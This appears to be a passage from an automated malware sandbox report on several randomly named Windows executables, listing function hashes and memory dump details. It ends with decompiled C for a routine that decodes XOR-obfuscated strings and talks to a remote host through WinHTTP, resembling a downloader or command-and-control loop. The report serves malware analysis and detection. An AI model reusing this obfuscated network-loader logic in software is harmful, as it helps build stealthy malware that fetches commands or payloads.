                                                                • Instruction ID: e83bdeef959669ec3e4126ccdc325b0678f8f4760bf58b14cf90c2a06e105b80
                                                                • Opcode Fuzzy Hash: 91d1c7fb4e1444a96c4975dc89cf13b763dcd8824fe166e283f84fb889f83331
                                                                • Instruction Fuzzy Hash: 0FD0C9723C4201BFF2165F68AE06F363A29E3C6F01F35C025B240A50D5CEA45900961E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Analysis Process: 2mqvpn30gyk.exe PID: 6768 Parent PID: 6644 2mqvpn30gyk.exeCOMMON

                                                                Executed Functions

                                                                Function 00007FFA331C1A99, Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tt_H
                                                                • API String ID: 0-1945571164
                                                                • Opcode ID: 84589e45cba6bb16cbe08aa56caee699c8d6b794d7d968cb47f89e27e75ed393
                                                                • Instruction ID: 1fd82ffd984d5ef70104437b30220113ae5b39840de185caa7f067c1c8da9da1
                                                                • Opcode Fuzzy Hash: 84589e45cba6bb16cbe08aa56caee699c8d6b794d7d968cb47f89e27e75ed393
                                                                • Instruction Fuzzy Hash: 16419D71949A4D8FDF94EBA8D4516ECBBF1FF5A310F10007AE00DE3292CA75A886CB40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA331C11D9, Relevance: .8, Instructions: 805COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ad0bad0a22d27efcb69285d3165a7f94a8c7c0c6b7cc4c3ccd84ee7390f01edc
                                                                • Instruction ID: 35437a86ff222489e9e31b8da5b1148bab61e535bd9ab8d149bf9910d6615509
                                                                • Opcode Fuzzy Hash: ad0bad0a22d27efcb69285d3165a7f94a8c7c0c6b7cc4c3ccd84ee7390f01edc
                                                                • Instruction Fuzzy Hash: 4BB1FE34A586595FFB44EB68C8E2AE9B7F2EF4A310F444475D00DE32CAC968BC418F61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA331C00E8, Relevance: .6, Instructions: 630COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 84f2b99d5e1fc0230dbff6d5319cd0ac2b0ab9c96502dc9273821f1b1c3ff7a7
                                                                • Instruction ID: c16f4597c652593c6446c4fc34cccf8a01a711c0e10a9d197e685af4b26daa18
                                                                • Opcode Fuzzy Hash: 84f2b99d5e1fc0230dbff6d5319cd0ac2b0ab9c96502dc9273821f1b1c3ff7a7
                                                                • Instruction Fuzzy Hash: BD71FA70908A5D8FDB94EBA8C8957ADBBF1FF5A301F0041BAD00DE7256CE74A985CB41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA331C011D, Relevance: .6, Instructions: 619COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 206593363df2f1d27814a69e2747687a758f1d560ef93b4e223ccf89eca09558
                                                                • Instruction ID: 49f7ff62938b2d97cfed0cb6948a216f6780c14d77c74b5dc5cf9c0cd731d55c
                                                                • Opcode Fuzzy Hash: 206593363df2f1d27814a69e2747687a758f1d560ef93b4e223ccf89eca09558
                                                                • Instruction Fuzzy Hash: C171EC70908A5D8FDB94EFA8C895BADBBF1FF5A301F0441AAD00DE7252DE749885CB41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA331C00E0, Relevance: .3, Instructions: 265COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5bab17cb0e372de35d5660228ac6e3d64060cf3b8ac6c5efaa1bf692b194bb43
                                                                • Instruction ID: 929309c42a729e77472bb09950803e287b2a569d32ec9e6b02f6a2326562bc31
                                                                • Opcode Fuzzy Hash: 5bab17cb0e372de35d5660228ac6e3d64060cf3b8ac6c5efaa1bf692b194bb43
                                                                • Instruction Fuzzy Hash: E3A1FB34A589599BFB84EB68C4D2AE9B7F2FB5D310F404434D10DE338ACA64B8418F61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA331C0729, Relevance: .3, Instructions: 253COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1d7e0949b3a091ad7215fe88ef61c4ea16af477765e1ed5999dcc9ed20f01514
                                                                • Instruction ID: 4f29d10d92b44b497d898888fa7105266d6d08898b9a1832d8448fbc6b000070
                                                                • Opcode Fuzzy Hash: 1d7e0949b3a091ad7215fe88ef61c4ea16af477765e1ed5999dcc9ed20f01514
                                                                • Instruction Fuzzy Hash: 8191C670A08A5D8FDF94EB58C895BACBBF1FF69300F4541A9D00DE7262DA75AD80CB41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA331C0C89, Relevance: .2, Instructions: 170COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 318d0199aa1c1238afeb4c63b652b3e36a554ff0fdc008d658279dcd8308294d
                                                                • Instruction ID: 6749c0386034634e6e9aef9f2dd936ed46c3295ed3e55e55cd661a77ca95e88e
                                                                • Opcode Fuzzy Hash: 318d0199aa1c1238afeb4c63b652b3e36a554ff0fdc008d658279dcd8308294d
                                                                • Instruction Fuzzy Hash: 2C51D070908A5D8FEB94EF68C8A57ACB7B1FF5A300F5041B9D00DE7296DE759881DB40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA331C0A7D, Relevance: .1, Instructions: 140COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d3baba8830b790d57e108ef576e96cb72cbc7b3b8d0fbb321c4d83c2b011fb7e
                                                                • Instruction ID: 24f33dd71ec578ca772a26d15180f2c423b65ff812fad79b4c8c006ac183801a
                                                                • Opcode Fuzzy Hash: d3baba8830b790d57e108ef576e96cb72cbc7b3b8d0fbb321c4d83c2b011fb7e
                                                                • Instruction Fuzzy Hash: 02412430C4D78A9FDB15DB6098625FA7BB4EF47314F0540BAD00DE7192CD2EA986C761
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA331C1981, Relevance: .1, Instructions: 97COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 73d113c61ae47123fd66b7cea0e745bd4043680d796e8b279e6dbfdc35068758
                                                                • Instruction ID: 6eeb5ce888e11092bd89c1a5518e415a170a0c72b51e5a034d40e4706ceb795f
                                                                • Opcode Fuzzy Hash: 73d113c61ae47123fd66b7cea0e745bd4043680d796e8b279e6dbfdc35068758
                                                                • Instruction Fuzzy Hash: 0731283094CA4E8FEF94EF58D8456EEBBE0FF5A300F105576E00DE3195CA79A9859B80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA331C00D8, Relevance: .1, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 400d942df38595071c392d5c76cf645a4ad888f90fc81331fe8bdfa141b2c15b
                                                                • Instruction ID: 88581916d4efdcf2abbadfd71b4f52dc8a14447f03b19e3daa4d473118c7574a
                                                                • Opcode Fuzzy Hash: 400d942df38595071c392d5c76cf645a4ad888f90fc81331fe8bdfa141b2c15b
                                                                • Instruction Fuzzy Hash: 3D213871E58A1D8BDF90EFA8D8456EDB7F5FF5A310F004136E00DE3280DA79A9949B81
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA331C10F5, Relevance: .1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0af636e68d35ac49c035274a7234a76acda94ad64dd013e4d2aacb3d71f4ae84
                                                                • Instruction ID: 63558269875d62a7240b41da96100359a58c982ca4be9621bfa85028dcaf87d2
                                                                • Opcode Fuzzy Hash: 0af636e68d35ac49c035274a7234a76acda94ad64dd013e4d2aacb3d71f4ae84
                                                                • Instruction Fuzzy Hash: 99212471D4CB4D8FEB90DF68D8456ADB7B1FF5A300F044176E00DA3291DA69A8849B81
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Analysis Process: tpwlxkeo40z.exe PID: 6420 Parent PID: 6644 tpwlxkeo40z.exeCOMMON

                                                                Executed Functions

                                                                Function 00007FFA31B401F1, Relevance: .1, Instructions: 131COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.792167024.00007FFA31B40000.00000040.00000001.sdmp, Offset: 00007FFA31B40000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b207828aca7a45fdf3d8fb06227305079f942245e20731b4af4e43577a8f11aa
                                                                • Instruction ID: 09681e44aaa75dd3187aa7e0389ffb7533b1a121d1cea2494d6d065a287bfd89
                                                                • Opcode Fuzzy Hash: b207828aca7a45fdf3d8fb06227305079f942245e20731b4af4e43577a8f11aa
                                                                • Instruction Fuzzy Hash: 91418C61F0DB894FEB92EB3888516A97BE1EF5B240F55C1BAD04DC7293DD28AC049742
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B40543, Relevance: .0, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.792167024.00007FFA31B40000.00000040.00000001.sdmp, Offset: 00007FFA31B40000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1da5faf01be2aa91a157161c8f4fa9287ddfdefa111f2feb75001248f0448f0d
                                                                • Instruction ID: 44014f6a6928ed3c01b6b6ff605a7b3bc842ccc13f621f70270c2f0c349c3aac
                                                                • Opcode Fuzzy Hash: 1da5faf01be2aa91a157161c8f4fa9287ddfdefa111f2feb75001248f0448f0d
                                                                • Instruction Fuzzy Hash: C6E0C241B5890E0BEB557B2858863B9B3C5EBCA312B44C076E90FC2387CC0DAC41D281
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Analysis Process: vkfgkd5pxm1.exe PID: 1548 Parent PID: 6644 vkfgkd5pxm1.exeCOMMON

                                                                Executed Functions

                                                                Function 010A7057, Relevance: 142.2, APIs: 26, Strings: 55, Instructions: 477libraryloaderCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 66%
                                                                			E010A7057(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, char _a24, intOrPtr _a40) {
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				short _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				intOrPtr* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v66;
				intOrPtr _v70;
				char _v74;
				short _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				short _v90;
				intOrPtr _v94;
				intOrPtr _v98;
				intOrPtr _v102;
				intOrPtr _v106;
				intOrPtr _v110;
				intOrPtr _v114;
				intOrPtr _v118;
				intOrPtr _v122;
				intOrPtr _v126;
				intOrPtr _v130;
				intOrPtr _v134;
				intOrPtr _v138;
				intOrPtr _v142;
				intOrPtr _v146;
				intOrPtr _v150;
				intOrPtr _v154;
				intOrPtr _v158;
				intOrPtr _v162;
				intOrPtr _v166;
				intOrPtr _v170;
				char _v174;
				short _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				char _v192;
				short _v194;
				intOrPtr _v198;
				intOrPtr _v202;
				intOrPtr _v206;
				char _v210;
				short _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				char _v356;
				void* _v360;
				char _v380;
				void* _v384;
				char _v404;
				intOrPtr _v412;
				char _v428;
				void* __edi;
				intOrPtr _t236;
				intOrPtr _t240;
				void* _t246;
				char* _t247;
				struct HINSTANCE__* _t249;
				_Unknown_base(*)()* _t250;
				intOrPtr _t251;
				intOrPtr _t260;
				_Unknown_base(*)()* _t262;
				char* _t269;
				_Unknown_base(*)()* _t271;
				intOrPtr _t272;
				intOrPtr _t279;
				_Unknown_base(*)()* _t281;
				void* _t282;
				_Unknown_base(*)()* _t287;
				void* _t288;
				_Unknown_base(*)()* _t291;
				void* _t292;
				signed int _t293;
				intOrPtr _t295;
				intOrPtr _t302;
				signed int _t337;
				signed int _t339;
				intOrPtr* _t340;
				intOrPtr* _t345;
				void* _t352;
				signed int _t358;
				intOrPtr _t362;
				intOrPtr* _t366;
				signed int _t374;
				signed int _t380;
				void* _t383;
				void* _t384;
				void* _t385;
				intOrPtr* _t387;
				void* _t389;
				CHAR* _t390;
				void* _t391;
				intOrPtr* _t392;

				_v12 = __ecx;
				_v20 = __edx;
				_v16 = 0;
				_t337 = 0;
				_v88 = 0;
				_v56 = 0;
				_v356 = 0xe231e201;
				_v352 = 0xe22fe232;
				_v348 = 0xe212e221;
				_v344 = 0xe225e223;
				_v340 = 0xe220e203;
				_v336 = 0xe264e23e;
				_v332 = 0xe27ee279;
				_v328 = 0xe261e279;
				_v324 = 0xe267e263;
				_v320 = 0xe27be272;
				_v316 = 0xe21de21f;
				_v312 = 0xe21ae202;
				_v308 = 0xe275e214;
				_v304 = 0xe237e27a;
				_v300 = 0xe236e235;
				_v296 = 0xe27fe23b;
				_v292 = 0xe204e227;
				_v288 = 0xe208e201;
				_v284 = 0xe24ce20b;
				_v280 = 0xe224e246;
				_v276 = 0xe21be200;
				_v272 = 0xe206e205;
				_v268 = 0xe242e209;
				_v264 = 0xe258e259;
				_v260 = 0xe241e25e;
				_v256 = 0xe240e25c;
				_v252 = 0xe243e24c;
				_v248 = 0xe259e243;
				_v244 = 0xe249e241;
				_v240 = 0xe228e25a;
				_v236 = 0xe21be21d;
				_v232 = 0xe20de21f;
				_v228 = 0xe2aee2e9;
				_v224 = 0xe2b0e2b7;
				_v220 = 0xe2abe2b3;
				_v216 = 0xe2b1e2b5;
				_v212 = 0;
				do {
					_t43 = _t337 - 0x1dc0; // -7616
					 *(_t391 + _t337 * 2 - 0x160) =  *(_t391 + _t337 * 2 - 0x160) ^ _t43;
					_t337 = _t337 + 1;
				} while (_t337 < 0x48);
				_v32 = 0;
				_v212 = 0;
				_v28 = 7;
				_v48 = 0;
				E010945A0(0x10cab20);
				_v174 = 0xe22ee20d;
				_v170 = 0xe22ae238;
				_t339 = 0;
				_v166 = 0xe229e228;
				_v162 = 0xe268e227;
				_v158 = 0xe267e27d;
				_v154 = 0xe26be27a;
				_v150 = 0xe21ae264;
				_v146 = 0xe221e227;
				_v142 = 0xe23ee234;
				_v138 = 0xe220e225;
				_v134 = 0xe21be274;
				_v130 = 0xe277e202;
				_v126 = 0xe269e269;
				_v122 = 0xe26be274;
				_v118 = 0xe27de267;
				_v114 = 0xe236e209;
				_v110 = 0xe257e20e;
				_v106 = 0xe258e256;
				_v102 = 0xe21de244;
				_v98 = 0xe253e250;
				_v94 = 0xe249e241;
				_v90 = 0;
				do {
					_t77 = _t339 - 0x1dc0; // -7616
					 *(_t391 + _t339 * 2 - 0xaa) =  *(_t391 + _t339 * 2 - 0xaa) ^ _t77;
					_t339 = _t339 + 1;
				} while (_t339 < 0x2a);
				_t84 =  &_v174; // 0xe22ee20d
				_t340 = _t84;
				_v90 = 0;
				_t383 = _t340 + 2;
				do {
					_t236 =  *_t340;
					_t340 = _t340 + 2;
				} while (_t236 != 0);
				_t87 =  &_v174; // 0xe22ee20d
				E010A7844( &_v428, E010A7877( &_v48, _t340 - _t383 >> 1, _t87, _t340 - _t383 >> 1));
				_t345 =  &_v356;
				_t91 = _t345 + 2; // 0xe231e203
				_t384 = _t91;
				do {
					_t240 =  *_t345;
					_t345 = _t345 + 2;
				} while (_t240 != 0);
				E010A7844( &_v404, E010A796A( &_v428,  &_v356, _t345 - _t384 >> 1));
				E01094572( &_v428);
				E01094572( &_v48);
				_push(0);
				_t385 = 2;
				_t352 = 6;
				_t246 = E010A67CA(_t352, _t385);
				_t389 = LoadLibraryA;
				_push(0);
				_push(0);
				_t390 = "Winhttp.dll";
				_t247 =  &_v404;
				_push(0);
				if(_t246 == 0) {
					_push(0);
				} else {
					_push(4);
				}
				_t248 =  >=  ? _v404 : _t247;
				_t249 = LoadLibraryA(_t390); // executed
				_t250 = GetProcAddress(_t249, "WinHttpOpen"); // executed
				_t251 =  *_t250( >=  ? _v404 : _t247); // executed
				_v60 = _t251;
				if(_t251 != 0) {
					_push(0x1388);
					_push(0x1388);
					_push(0x7d0);
					_push(0x7d0);
					_push(_t251);
					 *(GetProcAddress(LoadLibraryA(_t390), "WinHttpSetTimeouts"))();
					_push(0);
					_push(_v20);
					_push(_v12);
					_push(_v60);
					_t260 =  *(GetProcAddress(LoadLibraryA(_t390), "WinHttpConnect"))();
					_v20 = _t260;
					if(_t260 != 0) {
						if(_a16 == 0) {
							_v194 = 0;
							_t386 = 0;
							__eflags = 0;
							_v210 = 0xe215e208;
							_v206 = 0xe213e216;
							_t358 = 0;
							_v202 = 0xe274e26b;
							_v198 = 0xe276e268;
							_v84 = 0xe20ee210;
							_v80 = 0xe217e211;
							_v76 = 0;
							do {
								_t132 = _t358 - 0x1dc0; // -7616
								 *(_t391 + _t358 * 2 - 0x50) =  *(_t391 + _t358 * 2 - 0x50) ^ _t132;
								_t358 = _t358 + 1;
								__eflags = _t358 - 4;
							} while (_t358 < 4);
							_push(0);
							_push(0);
							__eflags = 0;
							_push(0);
							_v76 = 0;
							_push(E010454F1( &_v210));
							_t269 =  &_v84;
						} else {
							_v192 = 0xe215e208;
							_t380 = 0;
							_v188 = 0xe213e216;
							_v184 = 0xe274e26b;
							_v180 = 0xe276e268;
							_v176 = 0;
							_v74 = 0xe20ee210;
							_v70 = 0xe217e211;
							_v66 = 0;
							do {
								_t114 = _t380 - 0x1dc0; // -7616
								 *(_t391 + _t380 * 2 - 0x46) =  *(_t391 + _t380 * 2 - 0x46) ^ _t114;
								_t380 = _t380 + 1;
							} while (_t380 < 4);
							_push(0x800000);
							_push(0);
							_push(0);
							_v66 = 0;
							_push(E010454F1( &_v192));
							_t269 =  &_v74;
						}
						_t271 = GetProcAddress(LoadLibraryA(_t390), "WinHttpOpenRequest"); // executed
						_t272 =  *_t271(_v20, _t269, _a4); // executed
						_v12 = _t272;
						if(_a40 > 0) {
							_v40 = 0xe22ee203;
							_v24 = 0;
							_v36 = 0xe228e22d;
							_v32 = 0xe220e22d;
							_v28 = 0xe267e27c;
							_t386 = E010454F1( &_v40);
							E010A77D5( &_v380, _t323,  &_a24);
							 *_t392 = 0x20000000;
							_t326 =  >=  ? _v380 :  &_v380;
							_push(0xffffffff);
							_push( >=  ? _v380 :  &_v380);
							_push(_v12);
							 *(GetProcAddress(LoadLibraryA(_t390), "WinHttpAddRequestHeaders"))();
							E01094572( &_v380);
						}
						E010943E9( &_v428, _a12);
						if(_v412 > 0) {
							_v52 = 0xe22ee203;
							_v48 = 0xe237e22c;
							_t374 = 0;
							_v44 = 0xe22be221;
							_v40 = 0xe26ae232;
							_v36 = 0xe230e23c;
							_v32 = 0xe22ee23a;
							_v28 = 0xe26de276;
							_v24 = 0;
							do {
								_t170 = _t374 - 0x1dc0; // -7616
								 *(_t391 + _t374 * 2 - 0x30) =  *(_t391 + _t374 * 2 - 0x30) ^ _t170;
								_t374 = _t374 + 1;
							} while (_t374 < 0xe);
							_t386 =  &_v52;
							_v24 = 0;
							E010A77D5( &_v380,  &_v52,  &_v428);
							 *_t392 = 0x20000000;
							_t316 =  >=  ? _v380 :  &_v380;
							_push(0xffffffff);
							_push( >=  ? _v380 :  &_v380);
							_push(_v12);
							 *(GetProcAddress(LoadLibraryA(_t390), "WinHttpAddRequestHeaders"))();
							E01094572( &_v380);
						}
						E01094572( &_v428);
						_t362 = _v12;
						if(_t362 != 0) {
							if(_a8 != 0) {
								_t387 = _a8;
								_t190 = _t387 + 1; // 0x1
								_v64 = _t190;
								do {
									_t279 =  *_t387;
									_t387 = _t387 + 1;
									__eflags = _t279;
								} while (_t279 != 0);
								_t386 = _t387 - _v64;
								__eflags = _t386;
								_push(0);
								_push(_t386);
								_push(_t386);
								_push(_a8);
								_push(0xffffffff);
								_push(0);
							} else {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
							}
							_t281 = GetProcAddress(LoadLibraryA(_t390), "WinHttpSendRequest"); // executed
							_t282 =  *_t281(_t362); // executed
							if(_t282 != 0) {
								_t287 = GetProcAddress(LoadLibraryA(_t390), "WinHttpReceiveResponse"); // executed
								_t288 =  *_t287(_v12, 0); // executed
								if(_t288 != 0) {
									while(1) {
										_v16 = _v16 & 0x00000000;
										_t291 = GetProcAddress(LoadLibraryA(_t390), "WinHttpQueryDataAvailable"); // executed
										_t292 =  *_t291(_v12,  &_v16); // executed
										if(_t292 == 0) {
											goto L43;
										}
										_t293 = _v16;
										_t419 = _t293;
										if(_t293 != 0) {
											_push(_t293 + 1);
											_t295 = E010218C3(_t386, _t419);
											_v56 = _t295;
											if(_t295 != 0) {
												E01024A10(_t389, _t295, 0, _v16 + 1);
												_t392 = _t392 + 0xc;
												_push( &_v88);
												_push(_v16);
												_push(_v56);
												_push(_v12);
												if( *(GetProcAddress(LoadLibraryA(_t390), "WinHttpReadData"))() != 0) {
													_t388 = _v56;
													_t366 = _v56;
													_v32 = _v32 & 0x00000000;
													_v28 = 0xf;
													_v48 = 0;
													_v64 = _t366 + 1;
													do {
														_t302 =  *_t366;
														_t366 = _t366 + 1;
													} while (_t302 != 0);
													E01094686( &_v48, _t388, _t366 - _v64);
													_t386 = _a20;
													E010944B8(_a20, E01096B70( &_v380, _a20,  &_v48));
													E01094615( &_v380);
													E01094615( &_v48);
												}
												if(_v88 != 0 && _v16 > 0) {
													continue;
												}
											}
										}
										goto L43;
									}
								}
							}
							L43:
							_push(_v12);
							 *(GetProcAddress(LoadLibraryA(_t390), "WinHttpCloseHandle"))();
						}
						_push(_v20);
						 *(GetProcAddress(LoadLibraryA(_t390), "WinHttpCloseHandle"))();
					}
					_t262 = GetProcAddress(LoadLibraryA(_t390), "WinHttpCloseHandle"); // executed
					 *_t262(_v60); // executed
				}
				E01094572( &_v404);
				E01094572( &_a24);
				return _v56;
			}












































































































































                                                                0x010a7063
                                                                0x010a7069
                                                                0x010a706d
                                                                0x010a7070
                                                                0x010a7072
                                                                0x010a7075
                                                                0x010a7078
                                                                0x010a7082
                                                                0x010a708c
                                                                0x010a7096
                                                                0x010a70a0
                                                                0x010a70aa
                                                                0x010a70b4
                                                                0x010a70be
                                                                0x010a70c8
                                                                0x010a70d2
                                                                0x010a70dc
                                                                0x010a70e6
                                                                0x010a70f0
                                                                0x010a70fa
                                                                0x010a7104
                                                                0x010a710e
                                                                0x010a7118
                                                                0x010a7122
                                                                0x010a712c
                                                                0x010a7136
                                                                0x010a7140
                                                                0x010a714a
                                                                0x010a7154
                                                                0x010a715e
                                                                0x010a7168
                                                                0x010a7172
                                                                0x010a717c
                                                                0x010a7186
                                                                0x010a7190
                                                                0x010a719a
                                                                0x010a71a4
                                                                0x010a71ae
                                                                0x010a71b8
                                                                0x010a71c2
                                                                0x010a71cc
                                                                0x010a71d6
                                                                0x010a71e0
                                                                0x010a71e7
                                                                0x010a71e7
                                                                0x010a71ed
                                                                0x010a71f5
                                                                0x010a71f6
                                                                0x010a71fd
                                                                0x010a7208
                                                                0x010a720f
                                                                0x010a7216
                                                                0x010a721a
                                                                0x010a7221
                                                                0x010a722b
                                                                0x010a7235
                                                                0x010a7237
                                                                0x010a7241
                                                                0x010a724b
                                                                0x010a7255
                                                                0x010a725f
                                                                0x010a7269
                                                                0x010a7273
                                                                0x010a727d
                                                                0x010a7287
                                                                0x010a7291
                                                                0x010a7298
                                                                0x010a729f
                                                                0x010a72a6
                                                                0x010a72ad
                                                                0x010a72b4
                                                                0x010a72bb
                                                                0x010a72c2
                                                                0x010a72c9
                                                                0x010a72d0
                                                                0x010a72d7
                                                                0x010a72db
                                                                0x010a72db
                                                                0x010a72e1
                                                                0x010a72e9
                                                                0x010a72ea
                                                                0x010a72f1
                                                                0x010a72f1
                                                                0x010a72f7
                                                                0x010a72fb
                                                                0x010a72fe
                                                                0x010a72fe
                                                                0x010a7301
                                                                0x010a7304
                                                                0x010a730b
                                                                0x010a7325
                                                                0x010a732a
                                                                0x010a7330
                                                                0x010a7330
                                                                0x010a7333
                                                                0x010a7333
                                                                0x010a7336
                                                                0x010a7339
                                                                0x010a735c
                                                                0x010a7367
                                                                0x010a736f
                                                                0x010a7374
                                                                0x010a7377
                                                                0x010a737a
                                                                0x010a737b
                                                                0x010a7380
                                                                0x010a7389
                                                                0x010a738a
                                                                0x010a738b
                                                                0x010a7390
                                                                0x010a7396
                                                                0x010a7397
                                                                0x010a739d
                                                                0x010a7399
                                                                0x010a7399
                                                                0x010a7399
                                                                0x010a73a5
                                                                0x010a73b3
                                                                0x010a73bc
                                                                0x010a73be
                                                                0x010a73c0
                                                                0x010a73c5
                                                                0x010a73d0
                                                                0x010a73d1
                                                                0x010a73d7
                                                                0x010a73d8
                                                                0x010a73d9
                                                                0x010a73e5
                                                                0x010a73e7
                                                                0x010a73e9
                                                                0x010a73ec
                                                                0x010a73ef
                                                                0x010a73fd
                                                                0x010a73ff
                                                                0x010a7404
                                                                0x010a740f
                                                                0x010a7483
                                                                0x010a748c
                                                                0x010a748c
                                                                0x010a748e
                                                                0x010a7498
                                                                0x010a74a2
                                                                0x010a74a4
                                                                0x010a74ae
                                                                0x010a74b8
                                                                0x010a74bf
                                                                0x010a74c6
                                                                0x010a74ca
                                                                0x010a74ca
                                                                0x010a74d0
                                                                0x010a74d5
                                                                0x010a74d6
                                                                0x010a74d6
                                                                0x010a74db
                                                                0x010a74dc
                                                                0x010a74dd
                                                                0x010a74e5
                                                                0x010a74e6
                                                                0x010a74ef
                                                                0x010a74f0
                                                                0x010a7411
                                                                0x010a7411
                                                                0x010a741b
                                                                0x010a741d
                                                                0x010a7427
                                                                0x010a7431
                                                                0x010a743b
                                                                0x010a7442
                                                                0x010a7449
                                                                0x010a7450
                                                                0x010a7454
                                                                0x010a7454
                                                                0x010a745a
                                                                0x010a745f
                                                                0x010a7460
                                                                0x010a746d
                                                                0x010a7472
                                                                0x010a7473
                                                                0x010a7474
                                                                0x010a747d
                                                                0x010a747e
                                                                0x010a747e
                                                                0x010a7503
                                                                0x010a7505
                                                                0x010a750b
                                                                0x010a750e
                                                                0x010a7512
                                                                0x010a7519
                                                                0x010a7523
                                                                0x010a752b
                                                                0x010a7532
